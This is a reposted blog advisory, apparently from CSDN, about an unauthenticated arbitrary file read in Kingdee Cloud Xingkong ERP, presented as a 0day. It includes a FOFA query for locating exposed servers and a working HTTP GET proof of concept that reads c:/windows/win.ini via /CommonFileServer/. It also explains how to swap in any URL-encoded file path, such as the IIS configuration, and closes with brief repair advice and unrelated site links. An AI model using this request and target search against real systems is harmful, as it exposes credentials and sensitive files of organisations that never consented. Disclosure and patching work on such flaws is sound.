Kingdee Cloud Xingkong arbitrary file read vulnerability recurrence (0day)

News 2023-08-16 02:42:21 views: null

0x01 Product Introduction

     Kingdee Yunxingkong is a cloud-based enterprise resource management (ERP) software that provides enterprises with integrated solutions for financial management, supply chain management, and business process management. Kingdee Cloud Xingkong focuses on large and medium-sized enterprises with multiple organizations and multiple profit centers, and provides an open ERP cloud platform for enterprises in the digital economy era with three characteristics of "openness, standardization and social interaction". The services cover: finance, supply chain, intelligent manufacturing, amoeba management, omni-channel marketing, e-commerce, HR, enterprise Internet services, helping enterprises to realize the new ecology of digital marketing and management restructuring, etc., and enhance the digital capabilities of enterprises.

0x02 Vulnerability Overview

     Due to the improper permission setting of Kingdee Cloud Starry CommonFileServer interface, unauthenticated attackers can use this vulnerability to access arbitrary files on the server, including database credentials, API keys, configuration files, etc., to obtain system permissions and sensitive information.

0x03 range of influence

    Version 6.x, Version 7.x, Version 8.x (all affected)

0x04 Recurrence environment

FOFA: app="Kingdee Cloud Starry Sky-Management Center" 

0x05 Vulnerability Reappearance

PoC

GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 ​​​​PS: The vulnerability is relatively simple and rude, just splice the file name directly after the /CommonFileServer/ path (special symbol url encoding)

 read IIS configuration file

 0x06 Repair suggestion

Turn off Internet exposure and set directory permissions

Purify data: Hard-code or uniformly code the file name parameters passed by users, whitelist control file types, and reject parameters containing malicious characters or null characters.

 

 

Guess you like

Origin blog.csdn.net/qq_41904294/article/details/132030706
Recommended
Face Wall Intelligence releases the Eurux-8x22B open source large model - it can be called the "science champion"
Kaiyuan Daily | Google supports Hongmeng to take over; open source Rabbit R1; Android phones supported by Docker; Microsoft’s anxiety and ambition; Haier Electric shuts down the open platform
Ranking
Jianzhi offer interview questions 68-II. The nearest common ancestor of a binary tree (recursive)
jQuery Mobile development 1-UI components
Summary of Kotlin function knowledge
[ZZ] The Naked Truth About Anisotropic Filtering
Diagnosis: record a recovery of abnormal CRASH storage caused the database to be unable to be opened normally
Redis introduction and Linux installation Redis
Experiment 2 Introduction to switches
glances open source command-line system monitoring tools introduced
Use of selector
vue3 handwriting a carousel picture
Daily
More
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)

Code World

© 2018 codetd.com